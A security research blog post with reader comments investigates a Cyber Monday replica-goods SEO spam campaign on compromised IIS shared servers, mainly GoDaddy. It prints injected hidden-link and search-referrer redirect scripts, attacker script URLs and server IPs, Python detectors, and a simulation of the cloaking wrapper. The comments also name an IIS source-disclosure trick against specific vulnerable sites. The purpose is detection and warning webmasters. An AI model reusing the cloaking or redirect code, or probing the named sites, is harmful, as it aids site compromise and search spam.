IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see patterns like this, I try to dig deeper and figure out what else those websites have in common. This time it turned out that quite a few GoDaddy Windows servers have been pwned by “replica spam” hackers.

Let’s Dig Into Some Numbers

1,782 Domains. I collected 1,782 unique compromised domains that the hackers use in this campaign. This list is just the tip of the iceberg, and I’ll show why a bit later, so read on.

305 IP Addresses. Those websites are scattered across 305 unique IP addresses (actually 304, if we ignore four domains whose addresses I couldn’t resolve). That is roughly 6 websites per IP on average. However, they are not evenly distributed: while many IPs have only one compromised site, some servers have hundreds of them.

Top networks:

  • GoDaddy: 95 hosts (31%) and 1,095 websites (61%)
  • Brinkster: 50 hosts (16%) and 258 websites (14%)
  • Network Solutions: 27 hosts (9%) and 77 websites (4%)
  • Versaweb LLC: 5 hosts (1.6%) and 88 websites (5%)

As you can see, 84% of all websites belong to 4 networks.

Let’s look closer at the servers on these networks, but before we do that I’ll show how I find compromised websites.

Cyber Monday Spam

The spam campaign I’m investigating promotes online stores that sell cheap “replicas” of popular luxury brands like Beats by Dre, Michael Kors, Lululemon, Uggs, Juicy Couture, Moncler, Ray-Ban, etc. Most of the doorways are currently optimized for Black Friday and Cyber Monday deals. The typical anchor text they use in their links is something like “michael kors cyber monday” or “uggs black friday”.

These spammy links point to the homepage of compromised websites, which typically have a block of hidden links at the bottom of the HTML code:

<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;">
... 30-400 spammy links here ...
</div>

If the website is vulnerable enough, the hackers will install a script that generates completely new spammy pages specifically for search engines and returns the normal pages to human visitors: cloaking. The “human” versions of the pages have a small script at the very top of the HTML (usually before the first tag of the document) that redirects visitors who arrive from a search engine to spammy sites. It is either something like this:

<script>
var s=document.referrer;
// fires only when the visitor came from a search results page,
// so the site owner, who types the URL directly, never sees the redirect
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
{
self.location='hxxp://www .jackets pretty .com'; //just one of many domains they use
}</script>

or a similar script, loaded from the spammers’ own server:

<script src="hxxp://nofie.talkmes . com/c/nofie.js" type="text/javascript"></script>

At this point they use the following script URLs:

hxxp://bats . solorule . com/d/bats.js
hxxp://bats . solorule . com/c/bats.js
hxxp://cancher . iamsanver . com/a/cancher.js
hxxp://cancher . letgopub . com/c/cancher.js
hxxp://cancher . sanonsport . com/d/cancher.js
hxxp://luover . unbangs . com/c/luover.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . sportruns . com/d/meika.js
hxxp://meika . ukingfans . com/c/meika.js
hxxp://nofie . godalice . com/d/cagode.js
hxxp://nofie . godalice . com/kspe.js
hxxp://nofie . rockenice . com/a/cagode.js
hxxp://nofie . rockenice . com/a/nofie.js
hxxp://nofie . talkmes . com/c/nofie.js
hxxp://ungogo . godleders . com/a/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . nightleder . com/d/ungogo.js
hxxp://js . xufengonline . com/js/zong.js
hxxp://www . monclerslocker . com/js/style.js

Most of them are on the 173.252.207.166 IP (Take 2 Hosting Inc).
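The three indicators described above (the near-invisible link block, the referrer-conditional redirect, and an external script loaded from one of the attacker’s hosts) are simple enough to check for without a scanner. The following is an added example, not code from this post or from Sucuri/Unmask Parasites: it scans a page’s HTML for all three and runs on two constructed sample pages. The registered-domain list is built from the script URLs above; the regular expressions are deliberately simple (flat div blocks only, no nested divs) and the 0.05 opacity cut-off and 10-link minimum are my own thresholds.

```python
import re
from urllib.parse import urlparse

# Registered domains of the attacker script hosts listed above (the hostnames
# vary between infections, the registered domains repeat).
SPAM_SCRIPT_DOMAINS = {
    "solorule.com", "iamsanver.com", "letgopub.com", "sanonsport.com",
    "unbangs.com", "ruvipshop.com", "sportruns.com", "ukingfans.com",
    "godalice.com", "rockenice.com", "talkmes.com", "godleders.com",
    "leftgod.com", "nightleder.com", "xufengonline.com", "monclerslocker.com",
}
SEARCH_ENGINES = ("google", "bing", "aol", "yahoo")

# Flat <div style="..."> ... </div> blocks. The injected block is a flat list of
# links, so the first closing tag is the right one; nested divs are not handled.
DIV_RE = re.compile(r'<div\b[^>]*\bstyle\s*=\s*"([^"]*)"[^>]*>(.*?)</div>', re.I | re.S)
OPACITY_RE = re.compile(r"opacity\s*:\s*([0-9]*\.?[0-9]+)", re.I)
ALPHA_RE = re.compile(r"alpha\(\s*opacity\s*=\s*0\s*\)", re.I)          # old IE filter syntax
LINK_RE = re.compile(r"<a\b[^>]*\bhref\s*=", re.I)
SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*"([^"]+)"', re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LOCATION_RE = re.compile(r"\blocation(?:\.href)?\s*=[^=]")              # assignment, not comparison


def is_hidden(style):
    """Inline style that makes the block invisible: opacity (near) zero or the IE filter."""
    if ALPHA_RE.search(style):
        return True
    m = OPACITY_RE.search(style)
    return m is not None and float(m.group(1)) < 0.05


def hidden_link_blocks(html, min_links=10):
    """Link count of every hidden <div> that holds at least min_links links."""
    counts = []
    for style, body in DIV_RE.findall(html):
        if is_hidden(style):
            n = len(LINK_RE.findall(body))
            if n >= min_links:
                counts.append(n)
    return counts


def referrer_redirects(html):
    """Inline scripts that test document.referrer for a search engine and then assign location."""
    hits = []
    for body in INLINE_SCRIPT_RE.findall(html):
        if "document.referrer" not in body:
            continue
        names_engine = any(
            f'indexOf("{e}")' in body or f"indexOf('{e}')" in body for e in SEARCH_ENGINES
        )
        if names_engine and LOCATION_RE.search(body):
            hits.append(body.strip())
    return hits


def registered_domain(host):
    """Last two labels of a hostname (good enough for the .com hosts on the list)."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def spam_script_srcs(html):
    """External script URLs whose registered domain is on the attacker list."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src.replace("hxxp", "http", 1)).hostname or ""   # accept defanged URLs too
        if registered_domain(host) in SPAM_SCRIPT_DOMAINS:
            hits.append(src)
    return hits


def scan(html):
    """Summarise all three indicators for one page."""
    return {
        "hidden_link_blocks": hidden_link_blocks(html),
        "referrer_redirects": len(referrer_redirects(html)),
        "spam_script_srcs": spam_script_srcs(html),
    }


# Constructed samples (not real pages): one infected homepage, one clean one.
INFECTED = (
    "<script>\nvar s=document.referrer;\n"
    'if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)\n'
    "{\nself.location='http://spam.example/';\n}</script>\n"
    "<html><head><title>Example Co</title>\n"
    '<script src="http://nofie.talkmes.com/c/nofie.js" type="text/javascript"></script>\n'
    "</head><body><p>Welcome to Example Co.</p>\n"
    '<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;">\n'
    + "\n".join(f'<a href="http://doorway{i}.example/">michael kors cyber monday</a>' for i in range(40))
    + "\n</div></body></html>"
)
CLEAN = (
    '<html><head><title>Example Co</title><script src="/js/app.js"></script></head>\n'
    '<body><div style="opacity:0.9"><a href="/about">About</a></div></body></html>'
)

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan(page))
```

Run it against a saved copy of your homepage (fetch it with a browser User-Agent; see the cloaking discussion below for why the crawler view differs). A hit on any one indicator is worth investigating; the hidden-div check in particular also catches injections that use other script hosts.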

Detection

All of these variants are easily detected by both Sucuri SiteCheck and Unmask Parasites, so it’s not a problem to check websites and tell whether they are infected or not.

Now that we know how to detect the infection, let’s just test random websites on some of the IPs that have many infected websites (based on my doorway analysis).

For example, let’s take 184.168.152.150 (where I found 25 doorways) and use Bing’s “ip:” search operator along with the “cyber monday” keyword to find websites on that server: http://www.bing.com/search?q=ip%3A184.168.152.150+cyber+monday. Now you can scan the websites from the results that point to home pages (/ or index.html). More than 70% of the websites I checked are still infected (the rest either won’t load or have already been cleaned).

Bing Cyber Monday Results

Compromised Servers

This simple Bing search revealed hundreds of infected websites on that server. I observed the same results for 49 out of 95 GoDaddy servers from my list.

184.168.152.149
184.168.152.150
184.168.152.151
184.168.152.3
184.168.27.116
184.168.27.204
184.168.27.205
184.168.27.206
184.168.27.32
184.168.27.33
184.168.27.34
184.168.27.35
184.168.27.36
184.168.27.37
184.168.27.39
184.168.27.40
184.168.27.41
184.168.27.44
184.168.27.46
184.168.27.47
184.168.27.81
184.168.27.82
184.168.27.83
184.168.46.17
184.168.46.18
184.168.46.74
50.63.196.33
50.63.196.34
50.63.196.35
50.63.196.47
50.63.197.10
50.63.197.12
50.63.197.13
50.63.197.139
50.63.197.140
50.63.197.141
50.63.197.142
50.63.197.144
50.63.197.145
50.63.197.203
50.63.197.206
50.63.197.207
50.63.197.208
50.63.197.6
50.63.197.7
50.63.197.8
50.63.197.9
50.63.202.26
97.74.215.156

Those 49 servers are shared Windows servers with thousands of sites each. For example, Domaintools.com says 2,050 sites use the 184.168.152.150 address. The websites I checked belong to different users, so it’s not just a matter of individual compromised accounts. And the websites are quite heterogeneous (ASP, PHP, pure HTML, etc.), so it doesn’t look like a common web application vulnerability either. It looks like those servers have been pwned by hackers who now have access to most user accounts there. Given that we know of almost 50 such Windows servers on the GoDaddy network, this may indicate infrastructure-level problems, or at least common Windows server security configuration issues.

The rest of the servers typically host one or very few websites (I suppose they are either dedicated servers or dedicated IPs), so they don’t affect this hypothesis.

Some of the Brinkster and Versaweb servers also have this issue:

65.182.100.172
65.182.100.177
65.182.100.186
65.182.100.191
65.182.100.88
65.182.101.106
65.182.101.150
65.182.101.152
65.182.101.206
65.182.101.207
65.182.101.41
65.182.101.60

76.164.226.242
76.164.226.243
76.164.226.244
76.164.226.245
76.164.226.246

It’s still not clear why not all websites on those servers have been infected (or have some of them been cleaned already?). Maybe the hackers infected them semi-manually, so a few hundred infected websites per server was good enough for them?

When checking random websites on the compromised servers I noticed that some of them used very old versions of CMSs (e.g. 4-year-old WordPress). Maybe such websites were the entry points that helped the hackers compromise the whole server later?

I also know that the hackers install PHP wrapper scripts on pure HTML sites. For example, it’s typical to see a default.php served instead of index.html when you request the homepage. This works because IIS serves the first file from its default document list that exists in the directory, and on shared hosting the provider, not the site owner, controls that list and its order; if default.php is listed ahead of index.html, a dropped default.php silently takes over the homepage without touching the original file. This wrapper script explains why you see the injected script at the very top of the HTML code and how the hackers manage to implement “cloaking” on pure HTML sites.
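To make the wrapper’s behaviour concrete, here is an added example that is not code from this post (the real wrapper is PHP and its doorway generator was not published): a simulation of what such a default.php decides per request, plus a checker that fetches the same URL as a browser and as a crawler and compares the two views. The sample pages, the crawler User-Agent markers and the redirect snippet are constructed stand-ins.

```python
import re
import urllib.request

# Constructed stand-ins for the site's real index.html, the doorway page the
# wrapper generates for crawlers, and the snippet it prepends for humans.
ORIGINAL_INDEX = "<html><head><title>Example Co</title></head><body><p>Welcome.</p></body></html>"
DOORWAY = ("<html><head><title>michael kors cyber monday</title></head>"
           "<body><a href='http://shop.example/'>cheap replica outlet</a></body></html>")
REDIRECT_SNIPPET = ('<script>var s=document.referrer;if(s.indexOf("google")>0||s.indexOf("bing")>0)'
                    "{self.location='http://shop.example/';}</script>")
CRAWLER_MARKERS = ("googlebot", "bingbot", "slurp", "msnbot")   # assumed list, not the attacker's


def cloaking_wrapper(headers):
    """Server-side logic of a dropped default.php: search engine crawlers get a
    freshly generated doorway, everyone else gets the original page with the
    redirect script prepended, so the file on disk (index.html) looks untouched."""
    ua = headers.get("User-Agent", "").lower()
    if any(marker in ua for marker in CRAWLER_MARKERS):
        return DOORWAY
    return REDIRECT_SNIPPET + ORIGINAL_INDEX


def title_of(body):
    m = re.search(r"<title>(.*?)</title>", body, re.I | re.S)
    return m.group(1).strip() if m else ""


def cloaking_report(fetch):
    """fetch(headers) -> body. Fetch the same URL as a browser and as a crawler and compare."""
    browser = fetch({"User-Agent": "Mozilla/5.0"})
    crawler = fetch({"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"})
    # The redirect runs in the visitor's browser, so a server-side fetch never sees a 3xx;
    # look for the script in front of the document instead.
    prologue = browser.split("<html", 1)[0].lower()
    return {
        "cloaked": browser != crawler,
        "browser_title": title_of(browser),
        "crawler_title": title_of(crawler),
        "redirect_script_before_html": "document.referrer" in prologue,
    }


def http_fetcher(url):
    """Fetcher for a real site: same interface as the simulation, plain urllib, no JavaScript run."""
    def fetch(headers):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    print("simulated wrapper:", cloaking_report(cloaking_wrapper))
    print("clean site:", cloaking_report(lambda headers: ORIGINAL_INDEX))
    # For a live check: cloaking_report(http_fetcher("http://yourdomain.example/"))
```

The practical point is the one the report encodes: opening your own homepage in a browser shows the normal page, and sending a Referer header from the command line proves nothing either, because the redirect is client-side JavaScript. You have to compare the crawler view with the browser view, or read the response body rather than the status code.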

At this point, I can only see the following things in common on the servers used in this spam campaign:

  • Windows
  • IIS (usually an old version)
  • PHP support

I wonder whether this combination has a known security hole that allows attackers to pwn the whole server?

To Webmasters

This time I’d like to reach out to webmasters who host their websites on shared Windows servers, especially GoDaddy clients.

Please Check Your Websites ASAP!

You can start with free online scanners like Sucuri SiteCheck and Unmask Parasites.

Then check the search results for your website on Google (the “site:” operator), where you should look for unexpected keywords in your page titles and descriptions. Make sure to also check the “cached” copies that Google stores for your site. Then add the following keywords to your “site:” search; they may help you spot more web spam:

  • site:yourdomain.com cheap
  • site:yourdomain.com buy online
  • site:yourdomain.com “cyber monday”
  • site:yourdomain.com “black friday”
  • site:yourdomain.com outlet

Then you might want to figure out whether your server looks compromised. First, identify your website’s IP address. You can use commands like ping or host, you can enter your domain name on a website like whois.domaintools.com, or you can at least ask your hosting provider. With your IP, you can then use Bing’s “ip:” search along with some spammy keywords.

Here are a few searches I suggest you try (replace “ip address” with your server’s IP):

ip:ip address cyber monday
ip:ip address black friday
ip:ip address "beats by dre cheap"
ip:ip address "cheap louis vuitton"
ip:ip address viagra online
ip:ip address payday loans
ip:ip address "order cialis online"

If you see many results from different websites, you might want to ask your hosting provider what’s going on there and whether the server is really secure.

We are currently contacting hosting providers so they can address this issue…

33 comments
    1. The company I work for has hundreds of clients, this week the reports have been rolling in, we’ve confirmed 12 sites have been hacked in the exact manner discussed here. All 12 sites are hosted on GoDaddy shared “windows” servers. On all 12 sites we found at least one weird .asp file, usually saved in an odd directory to obviously go unnoticed, but saved in Sept 2014. So something happened back in Sept, and the hackers are just now exploiting it.

        1. Here is the code in the file:

          The filenames are never the same; this one was named “tcTycZgooZa.asp” and was hidden in an images directory.

          1. ASP backdoor. Haven’t seen a true IIS backdoor in ages… But be careful, when NTFS file permissions are set wrong and / or application pools run under a privileged user (like NETWORK SERVICE), then this could and will compromise your entire server!

          2. Yes very true, but since this is on a shared hosting plan with GoDaddy and it has affected many, I am concerned, but keep in mind that the ability to control the pools and service accounts is locked down by the provider.

          3. Ok another thing to consider….. (My Background: I have done many hours researching this because I take it personally when I have been hacked and no one seems to know why.) Just for kicks go visit http://narratavius.com Notice anything odd? Why would a new domain have been hacked? FTP? ASP? IIS? and why would it be infecting IIS shared hosting plans by the masses? I had two completely separate accounts, both Windows shared hosting plans, get hit with this.

      1. I noticed an odd .asp file as well. It was a time stamp code, perhaps gathering information that the hosted site/server was on the vulnerable list. It was dated a couple of weeks before the actual HTML files were modified with linkspam.

  1. Was IIS compromised, or websites on IIS?

    IP addresses report different versions of IIS: 6.0(!), 7.0, 7.5. The Versaweb IPs report to be running nginx with an ancient PHP 5.2. As far as server response headers are reliable, of course.

    1. It’s not clear what exactly was compromised. But I can see that this campaign targets only sites on IIS servers. And on some of them, a significant number of unrelated sites are hacked.

      Good catch on the Versaweb. Indeed, nginx. But it looks like all the sites there have been specifically built for this black-hat SEO campaign. For example, check this site: lalenguafanzine.com. Only the home page, with all navigation links broken. And those links point to .aspx(!!!) pages. So it looks like they copied a template of some legitimate site and filled it with spammy content.

      The same applies to the rest of the sites on the Versaweb IPs. Another, quite meaningful domain: http://www.daytonbowenworks.com – again a spammy homepage and broken .aspx pages. This site has definitely been copied from hxxp://humanfactoranalytics .com/, which is hosted on 184.168.152.151 – GoDaddy – you can find it in my list of the GoDaddy IPs in this article.

      1. Hmm, the first two sites in your Bing result page (bhnetug [.] org, latetermabortion [.] net, hosted on the IP address 184.168.152.150 are vulnerable to a source code disclosure vulnerability in IIS. This one is waayy old: http://www.saotn.org/multiple-iis-60-75-vulnerabilities/ , http://seclists.org/fulldisclosure/2012/Jun/189.

        For example on latetermabortion [.] net, add /default.asp/.php to the URL to view the source code. I can only imagine the IIS configuration is so wrong it’s vulnerable to many more vulnerabilities. For all you know the application pools run under the same identity (not “applicationpool identity”) and one website breach can mass deface all others.

        From the looks of it, bhnetug [.] org runs an old version of DotNetNuke, and see /default.aspx/.php.

        Edit: Denis, do you – or does Sucuri – have a security contact with GoDaddy on this matter? The .NET source code disclosure vulnerability (2.5 years old…) needs to be patched.

      2. So far I only see IIS 7.0 being affected. What is interesting is that, searching for key code words used by the linkspam, I found some similar attempts earlier this year with the same key words without the black friday etc etc.

  2. We had a client last week with this problem. We don’t control his hosting but by the time anyone noticed it, someone, maybe his webhost GoDaddy, had already corrected it. He’s hosted on an IIS server.

  3. I experienced this back in mid October, not the same time frame but everything else matches. I spent ages on hold with GoDaddy tech support trying to get access to the logs to try to figure out how they got in. When the tech came back on the line he was evasive and the only thing I could get out of him was that it was fixed. Hung up after learning nothing but with a strong suspicion that the issue was definitely on their end. No problems since.

    1. Similar GoDaddy story here. But then listen to this, we downloaded our client’s web logs for the past month. The IIS log for the date the files were modified is conspicuously missing. The log for the day before and day after are there, but for the day we believe the breach occurred there is no log file.
      And then when our client called GoDaddy to report the breach, the GoDaddy rep. made some unexpected comments to my client… basically insinuating that since I contacted the client before the client knew they were breached, that maybe I had something to do with it.

  4. So far I have a this response from GoDaddy:

    “We review and investigate every report and will take immediate action to stop such activities.

    Due to the large amount of sites you have reported this may take some time to fully resolve but we will do so as swiftly as possible.”

    But I’m planning to contact them again – I found a few more similarly compromised servers.

    1. One of my sites I just noticed got hacked on 11-27-14 again, adding more SEO spam to what was already there. Interestingly it did not affect my other hosting account. I left this infected account alone waiting for someone to look into it. If you want access to this account (untouched for forensics) you are more than welcome to have at it to see the hack. Please contact me at chris.wendi(at)gmail(dot)com

  5. Really good catch on the “source code disclosure” vulnerability. This made my investigation a bit more fruitful since I can now see server-side malicious code.

    And I checked a few other GoDaddy servers and they are vulnerable too. On the other hand, Brinkster servers are not vulnerable

  6. YES! I think you’re on to something! I too believe this is an IIS vulnerability hack. Interestingly, earlier this year, mid summer, I found an Iranian hacker (via Google keyword code searches) defacing websites; one of the footprint CSS style codes used in this SEO spam hack was also ironically on the hacked site they defaced.

  7. My website is still affected by this, as of now, 12/15/14. It is on one of the servers you list in the article – 184.168.46.17 My website forwards to an UGGS boot spam site. But only the home page, and only when accessed through a search engine (Google, Bing, and Yahoo). I have called GoDaddy support twice about this, and they say they can’t see the problem, and that they have checked the server multiple times, and that everything is fine. But the problem persists, and I have confirmed with several friends in different parts of the country, and they are directed to the UGGS spam site as well. I do not know what to do, because GoDaddy will not acknowledge it. I have directed them to this very article, but they say that they don’t know what I am talking about.

    1. That is the very reason I have got involved online. They want to sell me a site monitoring service instead of addressing the real issue.

  8. I have a site on brinkster that recently suffered with this issue (for the second time in 6 months).
    The site is .asp and is on 65.182.100.192.

    Thanks to this article and the comments I found that if I add /.php to the urls I can view the source code of my site (Microsoft IIS 7.5 .NET source code disclosure and authentication bypass)

    The brinkster control panel for shared hosting does not allow configuration of IIS. You also cannot disable FTP
    The fix I used for the view source issue was to add a web.config file with

  9. What fun. I found the virus on all of my sites today; a quick search and I find my IP in your list above. Thanks for the update. Only bright side is my sites get next to no traffic so the hackers gained nothing.
    Now to start fixing.

  10. Hacked two of my websites. WHAT I WANT TO KNOW…yes yelling at you NetworkSolutions is why it took Webmaster Tools at Google to see it roughly two weeks after it happened, and you never had a clue. I only found out after Google crawled my site. Have three service calls to NWS and not even a reply. Please add the redirect spam site hxxp://www.bestjordanslocker.com/ . Looks like my email to GoDaddy (hosting site for offending website and registrar) did not go unnoticed for long. However, still quite a few websites infected if you search for “feets.asp?id=95” . The offending redirect. I am thrilled to have found this site. Thank you so much Denis for posting your report!!! Bookmarked for reading. Thanks, Greg

  12. Thank you! I’ve been contacting Go Daddy about this since November. I keep uploading new pages, which become infected with the code quickly. Go Daddy isn’t doing anything even though I inform them of my issue. Armed with this information–all of which applies to my problems–I will go back to them and demand they clean up my server. Thank you for doing this for all of us!

  13. My GoDaddy shared hosting IIS ASP site was hacked on December 8. I happened to notice it on December 16, when I went in to update one of my pages. Called GoDaddy, and their view of the situation was “YOUR SITE was hacked,” not “OUR SERVER was hacked,” and their proposed solution was to insinuate that my web monkey was likely at fault, and to try to sell me SiteLock monitoring service. I cleaned the crap out (it was exactly the sort of thing you describe here), and am checking things regularly to see if it returns (hasn’t so far).

    Not that happy with Godaddy’s “we fail to keep things up to date, and then charge you for a monitoring service when, inevitably, our servers get hacked” business model.

  14. I’ve noticed an increasing number of WordPress brute force attacks in the last two months coming from GoDaddy, Rackspace, Leaseweb and other legit hosting addresses (and not from the usual zombie PCs). Is this connected to this security issue or is there another pwning campaign going on?
